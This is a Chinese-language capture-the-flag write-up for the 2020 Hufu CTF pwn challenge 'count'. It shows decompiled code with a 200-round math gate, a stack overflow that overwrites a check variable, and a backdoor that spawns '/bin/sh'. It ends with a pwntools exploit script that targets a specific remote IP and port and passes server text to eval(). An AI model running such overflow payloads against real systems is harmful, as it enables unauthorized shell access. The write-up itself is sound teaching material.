menu EDS
虎符ctf 2020 pwn count
1410 浏览 | 2020-04-19 | 分类:pwn | 标签:

count

题目给定ELF文件一个,经IDA分析为ARM框架的ELF文件,不好调试。

main函数如下

先答对简单数学题目200次进入下一步环节。

do
  {
    v0 = time(0LL);
    v15 = v0;
    v1 = srand(v0);
    v2 = (unsigned int)((signed int)rand(v1) % 100);
    v14 = v2;
    v3 = (unsigned int)((signed int)rand(v2) % 100);
    v13 = v3;
    v4 = (unsigned int)((signed int)rand(v3) % 100);
    v12 = v4;
    v11 = (signed int)rand(v4) % 100;
    printf("there have 200 levels ~");
    printf("Math: %d * %d + %d + %d = ???");
    printf("input answer:");
    read(0LL, &v6, 20LL);
    v10 = v14 * v13 + v12 + v11;
    v9 = strtol(&v6, 0LL, 10LL);
    if ( v10 != v9 )
    {
      puts("wrong ");
      exit(0LL);
    }
    puts("good !");
    ++v16;
  }
  while ( v16 <= 199 );

题目有明显栈溢出漏洞

  v8 = 256;
  read(0LL, &v7, 110LL);
  if ( v8 == 0x12235612 )
  {
    puts("get it ~");
    sub_400920();
  }

题目提供预留后门

__int64 sub_400920()
{
  return system("/bin/sh");
}

经分析通过v7的数据溢出可以覆盖至v8所在的地址,进行数据修改操作,将v8内的值从256替换至0x12235612即可执行预留后门。

经计算,v8的内存地址和v7的内存地址距离为0xDC-0x78=0x64

exp如下

#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level = 'debug'


r=remote('39.97.210.182',40285)

for i in range(200):
    r.recvuntil('~Math: ')
    math = r.recvuntil('=')[:-1]
    r.sendline(str(eval(math)))

r.sendline('a'*0x64+p64(0x12235612))
r.interactive()

发表评论

email
web

全部评论 (暂无评论)

info 还没有任何评论,你来说两句呐!